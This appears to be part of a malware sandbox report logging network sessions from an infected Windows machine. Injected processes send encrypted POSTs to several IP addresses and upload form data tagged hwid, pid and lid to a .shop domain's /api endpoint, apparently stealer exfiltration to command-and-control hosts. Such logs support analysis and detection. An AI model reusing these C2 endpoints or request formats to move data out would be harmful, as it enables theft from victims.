                                                                              2024-07-27 12:53:32 UTC4096INData Raw: 35 b9 3d ae e8 36 9e 93 e1 f3 a5 4d 25 b8 bc 10 7d bc da a6 8e cf e2 62 c4 0a f4 79 8a 7b 51 7d ed eb f2 55 1c b1 f3 76 9e 53 a7 e8 e0 11 ac 13 e5 d5 36 8d 68 f2 bf 40 59 40 cd 4a 8e 99 f1 88 bb dc e9 f2 85 c0 b6 da da 16 e9 d8 31 08 d4 60 b8 95 27 1d 6d cb d6 09 9d 7d 6a 22 db 89 6d 03 1b e8 b2 16 e8 98 2c 87 c0 49 9d e5 46 55 11 c1 c1 b0 38 ab 79 86 66 3d a5 db 6d 9c f9 b9 87 77 b6 a3 45 7b 5d cb b8 0c 53 11 a5 ba d0 6a a1 65 25 e5 31 e1 1c b5 52 55 5a 2b 0a da db d2 72 e1 6e 5b 74 a1 9b 77 1d da 35 e7 57 8e 16 36 55 b0 7d 7b 4d fc d4 5f fe 6c db 28 d8 b0 d0 7b d3 0a 24 6a c0 9d 72 21 c4 a0 bb e2 41 50 4a b6 0e e0 db a4 fc 94 2a 27 9f fd 62 72 6b 75 b8 54 bb eb 0e b4 ab a9 b6 aa 42 8a 50 77 c5 a2 fc 9a 38 89 99 68 9a e8 b0 23 f9 ad c2 a9 41 50 81 e4 e5
                                                                              Data Ascii: 5=6M%}by{Q}UvS6h@Y@J1`'m}j"m,IFU8yf=mwE{]Sje%1RUZ+rn[tw5W6U}{M_l({$jr!APJ*'brkuTBPw8h#AP
                                                                              2024-07-27 12:53:32 UTC4096INData Raw: b5 f0 9a a4 71 b4 47 db 05 8d 76 04 b0 1e 89 34 33 9d 71 eb 4d 47 10 37 d1 11 81 44 b3 39 28 51 70 a5 44 0e 0a 37 5a d7 44 78 03 61 1a 21 0b fb 62 85 64 24 f3 1c 64 93 c2 67 2a 48 a4 18 ef e9 f8 f1 5a 41 11 d3 4d 71 4f f8 3c 89 45 bb 37 6b d5 d3 c1 f8 09 0a db 78 17 8b e8 10 f2 4d c6 fb 97 29 a7 6f 33 d2 d2 8d a9 45 d9 72 fe 52 7b 70 eb 2c e9 fb a6 d9 f7 2d 7c 5d a3 94 fd 14 5f 42 a7 31 f1 52 e5 db d4 35 8f 01 39 8a 11 ef 18 9e 0c a7 ab e0 ca 83 62 8a 6a 7b 60 d1 dd 11 b9 4e ee 2b e8 79 72 41 e4 de 95 4c 52 84 0f 5e 77 74 d2 f0 58 5e 39 20 b3 55 7e f1 4b c3 04 ef f8 8f 09 e0 40 31 08 0f 59 f9 df ed 51 83 59 78 48 0c 2e 40 e7 60 eb 97 5f c9 c4 c6 d9 46 c3 6d 1f 50 2f 93 f9 72 7d 42 57 96 1b c0 ea 41 85 c9 f3 36 2a 7e 79 bb e1 19 22 92 47 86 81 ce a6 fa 63
                                                                              Data Ascii: qGv43qMG7D9(QpD7ZDxa!bd$dg*HZAMqO<E7kxM)o3ErR{p,-|]_B1R59bj{`N+yrALR^wtX^9 U~K@1YQYxH.@`_FmP/r}BWA6*~y"Gc
                                                                              2024-07-27 12:53:32 UTC4096INData Raw: 46 94 44 d4 1a bd 3d 25 28 41 89 70 53 b6 3c 25 25 87 79 91 ae c9 a4 55 0a 23 67 fa 87 63 75 7b 9d 41 56 7d 7f 0e 4e 89 bb be d7 da 36 be 6b c3 a1 06 8d f0 93 52 17 4d 10 c9 99 ea 02 e6 50 f9 e5 21 9e 7a ef 7b 14 85 df e2 43 42 e9 89 3e ce 49 11 a4 e9 1a 9b e0 63 7f cf 38 7b c0 30 0b 4d fc c8 36 a5 a1 f7 ef 19 2e 9b c0 9b d0 2a e1 a0 99 2a 24 92 2a 4b b8 b9 af b7 fe 77 cf e1 c2 cc 81 d8 2c 3a b0 ae 03 5d 77 b6 cb 0c f1 65 48 4b ba 80 14 71 91 ae d1 00 d0 b1 96 cb 3a a3 5f 8f 40 b8 5c 01 01 50 23 32 f9 af 96 a9 bb de 1a 18 32 4e 69 af 4a ea 2f 61 0f 18 82 76 e8 02 27 0f a1 33 99 cf e2 7a c7 72 82 55 fc 2d 8a 31 61 85 7c 4f 50 24 40 e5 8f 80 8f b9 e4 4c 85 3e 7f fc 3c df 03 e3 72 0e c4 81 8e b1 72 e3 f8 be 34 52 88 59 35 e9 d8 eb a0 0d 01 54 78 c8 02 bd 1c
                                                                              Data Ascii: FD=%(ApS<%%yU#gcu{AV}N6kRMP!z{CB>Ic8{0M6.**$*Kw,:]weHKq:_@\P#22NiJ/av'3zrU-1a|OP$@L><rr4RY5Tx


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.449783107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:33 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1263
                                                                              2024-07-27 12:53:33 UTC1263OUTData Raw: 64 34 52 6a 7a 52 52 52 32 72 58 39 63 48 37 4b 72 72 4d 65 39 49 36 75 30 6c 43 34 6d 46 4b 53 57 7a 37 48 4b 58 6c 5a 72 43 34 72 4d 77 38 76 70 46 6c 45 63 6d 75 52 74 35 69 70 31 31 6d 38 61 74 70 77 6d 44 63 6b 77 55 52 5a 63 31 58 69 71 58 4b 6c 61 74 37 34 6b 6e 47 52 7a 63 6e 41 59 79 6b 6e 66 39 49 35 66 2f 70 6a 70 31 4e 75 6f 70 34 6d 4c 38 70 6d 66 79 4b 75 47 69 75 62 4b 61 2f 34 76 6b 5a 58 51 58 71 33 4d 4e 79 67 73 72 5a 55 78 6b 45 6a 5a 38 43 62 63 31 6e 6a 59 57 72 38 42 79 6e 6f 6c 58 6b 30 78 31 64 70 72 69 66 4a 54 34 51 65 58 4f 6d 39 5a 35 76 67 76 79 4b 30 42 62 4f 64 54 32 6a 64 4a 41 6c 45 65 4c 64 6a 78 59 39 6d 4c 36 42 35 70 4b 43 46 59 38 5a 41 4c 33 35 45 52 34 6a 35 6e 53 6c 51 71 4e 55 68 38 46 42 6f 63 42 53 64 33 59 70
                                                                              Data Ascii: d4RjzRRR2rX9cH7KrrMe9I6u0lC4mFKSWz7HKXlZrC4rMw8vpFlEcmuRt5ip11m8atpwmDckwURZc1XiqXKlat74knGRzcnAYyknf9I5f/pjp1Nuop4mL8pmfyKuGiubKa/4vkZXQXq3MNygsrZUxkEjZ8Cbc1njYWr8BynolXk0x1dprifJT4QeXOm9Z5vgvyK0BbOdT2jdJAlEeLdjxY9mL6B5pKCFY8ZAL35ER4j5nSlQqNUh8FBocBSd3Yp
                                                                              2024-07-27 12:53:34 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:34 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:34 UTC685INData Raw: 58 42 49 6a 53 6b 4c 49 45 78 68 6a 51 59 38 48 55 31 4d 39 7a 53 2f 62 38 39 5a 78 4e 47 6f 75 2f 58 33 33 46 30 59 61 6c 54 76 33 4e 4b 75 41 42 46 68 58 51 4e 75 4e 36 4c 51 39 71 76 75 41 6d 54 47 31 6f 4e 51 2b 67 48 2b 30 30 6c 41 42 6d 75 2f 4e 54 4a 2f 6e 44 30 38 76 72 4d 56 5a 72 58 39 71 4f 39 70 77 50 63 52 79 49 75 52 63 45 2b 7a 36 70 6a 2f 52 65 70 54 49 65 75 71 6c 57 5a 4d 32 6f 67 34 56 77 62 78 73 67 77 75 33 68 77 7a 43 34 6d 4e 45 77 30 35 31 4d 66 6b 45 32 4c 61 77 5a 46 59 58 4d 46 4e 42 6b 52 31 34 32 42 71 53 35 71 63 34 6b 37 78 79 44 49 4b 71 77 33 4e 67 75 44 33 34 70 30 70 57 78 58 32 42 69 41 76 35 44 6e 59 73 7a 6c 31 62 51 58 4d 72 2f 6a 5a 6c 31 6a 73 58 34 57 43 2f 52 72 33 34 79 68 4e 46 46 6a 54 51 49 48 31 67 49 2b 77
                                                                              Data Ascii: XBIjSkLIExhjQY8HU1M9zS/b89ZxNGou/X33F0YalTv3NKuABFhXQNuN6LQ9qvuAmTG1oNQ+gH+00lABmu/NTJ/nD08vrMVZrX9qO9pwPcRyIuRcE+z6pj/RepTIeuqlWZM2og4Vwbxsgwu3hwzC4mNEw051MfkE2LawZFYXMFNBkR142BqS5qc4k7xyDIKqw3NguD34p0pWxX2BiAv5DnYszl1bQXMr/jZl1jsX4WC/Rr34yhNFFjTQIH1gI+w


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.449784188.114.97.34437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:33 UTC285OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8779
                                                                              Host: callosallsaospz.shop
                                                                              2024-07-27 12:53:33 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 43 32 36 30 43 33 46 46 35 33 41 36 41 32 36 42 32 36 32 33 42 44 38 41 41 31 32 34 30 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2C260C3FF53A6A26B2623BD8AA12404--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                              2024-07-27 12:53:34 UTC810INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5nrfmbos5gg57rranl0nl07nbj; expires=Wed, 20-Nov-2024 06:40:13 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zv%2Fu1YhXfLwL%2FXciIz3UuqWI1tXjee8wwEZXSylnHo81FwKgNXXp1HQ08hCHGPCsbqUz9TulTV8tgpi0lae0mddKw%2F3b%2F63U89H5Q8yvPFuzjPFvQ6ef3VGWOt69vtyGjBunvQb1kQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a9cc5e5ceff8cda-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-27 12:53:34 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                              Data Ascii: eok 8.46.123.33
                                                                              2024-07-27 12:53:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.449785167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:35 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:35 UTC1267OUTData Raw: 42 71 4e 72 6e 74 48 33 62 62 47 68 67 4e 44 70 30 42 32 33 37 70 65 30 6f 4e 6f 4b 61 58 75 30 37 6c 39 6d 4e 45 46 67 42 43 7a 4c 57 44 70 48 4e 5a 62 66 56 2b 33 4f 64 66 68 59 72 59 46 6e 64 51 30 74 4f 43 30 4d 34 59 44 6b 6d 51 54 70 42 58 7a 66 36 36 36 42 62 61 56 63 72 45 73 38 2b 33 64 71 6f 4f 43 72 69 37 42 41 53 76 61 39 49 58 66 6f 43 63 61 79 44 4f 48 76 51 4c 4e 51 73 65 54 6d 45 4e 70 49 69 56 47 72 53 64 46 62 4a 4b 57 70 77 38 4f 70 6f 4e 79 37 4d 39 48 59 73 57 72 78 36 34 37 6f 72 4e 6b 68 39 4f 41 48 78 34 78 64 59 54 73 66 69 6f 6b 6d 56 68 63 41 34 44 6a 47 67 4f 66 52 78 78 77 6a 4e 39 50 35 4b 58 42 59 72 42 4f 36 6b 78 34 57 2f 38 2b 77 32 31 72 69 48 45 58 39 4f 69 4f 32 2b 72 4f 77 73 74 70 69 41 33 52 58 49 64 51 76 39 62 4d
                                                                              Data Ascii: BqNrntH3bbGhgNDp0B237pe0oNoKaXu07l9mNEFgBCzLWDpHNZbfV+3OdfhYrYFndQ0tOC0M4YDkmQTpBXzf666BbaVcrEs8+3dqoOCri7BASva9IXfoCcayDOHvQLNQseTmENpIiVGrSdFbJKWpw8OpoNy7M9HYsWrx647orNkh9OAHx4xdYTsfiokmVhcA4DjGgOfRxxwjN9P5KXBYrBO6kx4W/8+w21riHEX9OiO2+rOwstpiA3RXIdQv9bM
                                                                              2024-07-27 12:53:36 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:35 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:36 UTC685INData Raw: 4c 7a 48 72 77 41 56 2b 61 68 77 57 78 31 50 69 57 72 51 57 42 47 63 74 56 56 50 59 56 30 39 66 44 4f 78 63 50 31 6f 4a 4b 79 41 57 31 2f 4a 46 41 5a 73 38 42 35 59 53 66 35 69 32 63 6f 4d 45 62 38 65 46 70 76 7a 49 4a 33 57 2f 64 5a 52 30 39 6a 5a 49 7a 33 43 34 76 6e 6c 36 72 2b 47 6b 2f 38 37 6c 6a 6c 56 51 2b 7a 70 6b 32 62 4e 38 48 4c 56 76 72 35 7a 49 6e 61 63 6d 39 44 73 4c 69 37 59 64 56 4c 54 42 6c 32 43 79 4a 6a 7a 4a 2b 2b 38 52 48 62 39 46 48 69 47 48 35 4d 78 41 68 49 2b 70 53 6a 5a 67 59 56 44 6e 49 51 2f 4d 31 2f 31 79 4e 62 4a 51 46 66 4c 4c 2f 33 31 70 32 5a 72 78 6a 4e 43 6a 66 46 2f 69 2b 6e 33 42 4f 4a 58 69 6b 74 39 6a 68 77 62 62 58 78 77 47 6b 57 55 53 50 73 5a 73 6d 66 39 42 61 66 4f 43 4d 6b 74 37 68 73 32 38 76 4c 79 48 34 57 31
                                                                              Data Ascii: LzHrwAV+ahwWx1PiWrQWBGctVVPYV09fDOxcP1oJKyAW1/JFAZs8B5YSf5i2coMEb8eFpvzIJ3W/dZR09jZIz3C4vnl6r+Gk/87ljlVQ+zpk2bN8HLVvr5zInacm9DsLi7YdVLTBl2CyJjzJ++8RHb9FHiGH5MxAhI+pSjZgYVDnIQ/M1/1yNbJQFfLL/31p2ZrxjNCjfF/i+n3BOJXikt9jhwbbXxwGkWUSPsZsmf9BafOCMkt7hs28vLyH4W1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.449786188.114.97.34437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:36 UTC286OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20432
                                                                              Host: callosallsaospz.shop
                                                                              2024-07-27 12:53:36 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 43 32 36 30 43 33 46 46 35 33 41 36 41 32 36 42 32 36 32 33 42 44 38 41 41 31 32 34 30 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2C260C3FF53A6A26B2623BD8AA12404--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                              2024-07-27 12:53:36 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                              Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                              2024-07-27 12:53:37 UTC808INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=vcanostq7bjq3oo21uuf1pn1q0; expires=Wed, 20-Nov-2024 06:40:15 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mO0iUnii7ZJJ5%2BToxgAXGn%2Ff4HQ%2FiJZhhu7GPRT26NOENPdJGRmWPgD1mQTeLsfFjcKGtR2BPMTOozjeIXSom1inaMZ17rqugOCGkpIlbVcZvblg8VoIhWRUEAvdQL7GrJGtu9p1FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a9cc5f80a051916-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-27 12:53:37 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                              Data Ascii: eok 8.46.123.33
                                                                              2024-07-27 12:53:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.449787107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:37 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:37 UTC1267OUTData Raw: 51 30 70 63 30 48 65 34 67 68 36 2f 33 30 4c 64 64 72 49 63 4e 44 42 4e 4a 5a 33 31 43 79 4d 51 5a 4a 59 64 51 61 62 71 34 38 32 61 7a 54 4d 54 62 2b 6f 75 73 5a 53 47 2f 45 31 2b 39 74 4c 75 50 45 31 44 4c 32 50 6f 33 44 66 45 43 6e 74 69 74 55 2f 50 47 4b 5a 56 58 41 76 65 6a 54 73 46 4f 6b 6d 2f 72 36 48 39 2b 72 53 32 73 54 39 67 42 55 76 73 64 66 79 42 4c 79 30 73 4d 79 4d 68 32 33 36 2f 6d 48 41 52 33 54 79 79 6b 75 46 6a 72 4f 78 6b 73 6d 74 4d 39 66 2f 38 53 6a 57 53 70 5a 69 41 6c 76 39 51 59 53 6f 5a 69 52 33 67 6a 65 34 31 32 6f 53 79 56 35 48 6a 43 75 76 55 70 43 63 78 31 69 6f 6e 35 76 77 66 4f 45 79 43 74 54 66 76 65 49 64 4e 46 7a 5a 6b 65 69 2b 41 49 32 65 70 47 41 63 2b 6e 53 79 51 67 44 6e 5a 46 51 52 4f 64 47 38 68 56 37 74 4e 36 67 66
                                                                              Data Ascii: Q0pc0He4gh6/30LddrIcNDBNJZ31CyMQZJYdQabq482azTMTb+ousZSG/E1+9tLuPE1DL2Po3DfECntitU/PGKZVXAvejTsFOkm/r6H9+rS2sT9gBUvsdfyBLy0sMyMh236/mHAR3TyykuFjrOxksmtM9f/8SjWSpZiAlv9QYSoZiR3gje412oSyV5HjCuvUpCcx1ion5vwfOEyCtTfveIdNFzZkei+AI2epGAc+nSyQgDnZFQROdG8hV7tN6gf
                                                                              2024-07-27 12:53:38 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:38 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:38 UTC685INData Raw: 53 6e 4f 53 41 2f 2f 2b 36 72 4f 6f 2b 55 69 7a 6e 42 73 69 77 58 53 69 36 45 77 69 35 4f 64 73 58 33 6c 42 4a 44 76 79 6c 52 36 47 6b 5a 71 56 66 56 49 68 6f 32 6b 32 4d 4c 64 6a 70 67 2b 52 48 31 70 33 69 57 72 5a 41 66 76 57 73 41 4c 5a 6e 49 76 46 62 7a 53 73 4a 72 45 45 52 73 38 30 62 35 32 42 56 4a 78 59 36 72 44 5a 6a 55 34 45 6d 4f 76 6b 78 76 46 6f 78 30 71 46 2f 47 6a 59 6f 5a 79 7a 36 34 70 49 72 52 58 53 62 46 30 56 69 46 70 54 61 63 49 42 45 70 58 69 68 35 2f 61 31 70 55 6b 64 31 68 39 4d 43 73 45 55 30 39 53 70 70 4b 58 4c 44 77 35 38 62 73 6d 52 70 61 66 34 55 53 61 66 59 54 41 73 31 68 62 4b 65 34 71 79 76 42 61 59 4f 74 52 34 51 71 32 45 66 53 2f 58 41 78 6d 63 33 70 78 57 44 54 31 38 52 6c 63 54 66 6a 2f 65 32 6e 62 4f 79 6a 75 6d 71 4d
                                                                              Data Ascii: SnOSA//+6rOo+UiznBsiwXSi6Ewi5OdsX3lBJDvylR6GkZqVfVIho2k2MLdjpg+RH1p3iWrZAfvWsALZnIvFbzSsJrEERs80b52BVJxY6rDZjU4EmOvkxvFox0qF/GjYoZyz64pIrRXSbF0ViFpTacIBEpXih5/a1pUkd1h9MCsEU09SppKXLDw58bsmRpaf4USafYTAs1hbKe4qyvBaYOtR4Qq2EfS/XAxmc3pxWDT18RlcTfj/e2nbOyjumqM


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.449788107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:39 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:39 UTC1267OUTData Raw: 55 56 2f 4e 45 55 39 6c 6a 42 45 6b 5a 44 46 76 34 61 64 79 46 4e 6c 44 70 59 34 4d 5a 2b 75 38 52 2f 54 44 58 36 37 65 72 68 66 51 4e 6b 34 68 65 38 48 67 74 51 4a 2b 49 49 56 52 41 2b 63 53 70 6b 55 4f 34 72 55 56 77 63 4d 77 6d 57 4d 6a 64 64 4b 68 33 71 42 77 58 33 58 71 72 56 2f 2f 65 73 67 6a 67 37 77 48 78 66 47 71 68 57 68 46 34 73 39 6d 6b 4e 6d 4b 56 46 44 49 69 41 61 63 5a 31 55 4a 57 2b 74 72 75 43 2b 4f 45 6b 61 69 57 30 2f 75 32 42 68 37 76 48 34 34 64 35 2f 58 65 56 4e 59 51 79 46 67 5a 50 45 75 43 72 4b 79 38 33 75 4b 47 70 41 6a 49 51 78 36 30 45 4d 79 67 70 53 6e 77 70 64 6e 6f 58 36 41 59 36 39 36 76 79 46 4d 77 34 49 67 34 4b 74 45 2b 55 74 79 7a 76 57 66 42 57 53 30 57 51 50 38 6f 39 6a 79 64 7a 4a 4a 38 34 55 6c 61 33 75 43 50 63 61
                                                                              Data Ascii: UV/NEU9ljBEkZDFv4adyFNlDpY4MZ+u8R/TDX67erhfQNk4he8HgtQJ+IIVRA+cSpkUO4rUVwcMwmWMjddKh3qBwX3XqrV//esgjg7wHxfGqhWhF4s9mkNmKVFDIiAacZ1UJW+truC+OEkaiW0/u2Bh7vH44d5/XeVNYQyFgZPEuCrKy83uKGpAjIQx60EMygpSnwpdnoX6AY696vyFMw4Ig4KtE+UtyzvWfBWS0WQP8o9jydzJJ84Ula3uCPca
                                                                              2024-07-27 12:53:40 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:40 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:40 UTC685INData Raw: 56 4d 50 36 37 74 46 43 30 61 70 6d 53 6e 6c 76 61 54 65 71 66 6f 77 34 71 62 74 76 33 57 66 6a 4e 32 62 52 79 51 53 49 48 67 56 68 55 41 50 62 55 58 4c 43 57 54 65 72 6a 73 75 65 48 4e 5a 63 36 61 65 74 74 55 70 54 75 79 47 4e 59 62 76 6c 46 34 55 63 44 74 4b 51 69 6f 4f 72 4b 42 75 39 66 58 33 36 62 77 78 53 59 6d 39 43 68 2b 5a 47 58 6a 31 76 48 41 35 30 6e 37 49 6e 31 73 33 50 4c 6f 2b 65 69 4c 6a 4a 56 67 63 79 46 42 31 70 52 73 73 34 35 63 59 75 39 39 51 41 75 32 53 30 64 68 32 6a 75 4d 49 66 4f 34 4e 52 43 72 62 57 64 6a 36 56 30 47 48 2f 78 76 50 66 51 47 77 62 41 45 77 76 51 52 50 36 55 66 59 42 73 6a 73 66 6f 49 59 5a 51 2f 6a 35 54 48 70 42 78 51 51 36 62 4e 4c 74 6b 50 33 4f 57 44 35 31 58 45 79 4e 34 33 32 4d 54 54 63 42 4d 51 74 4a 32 4f 47
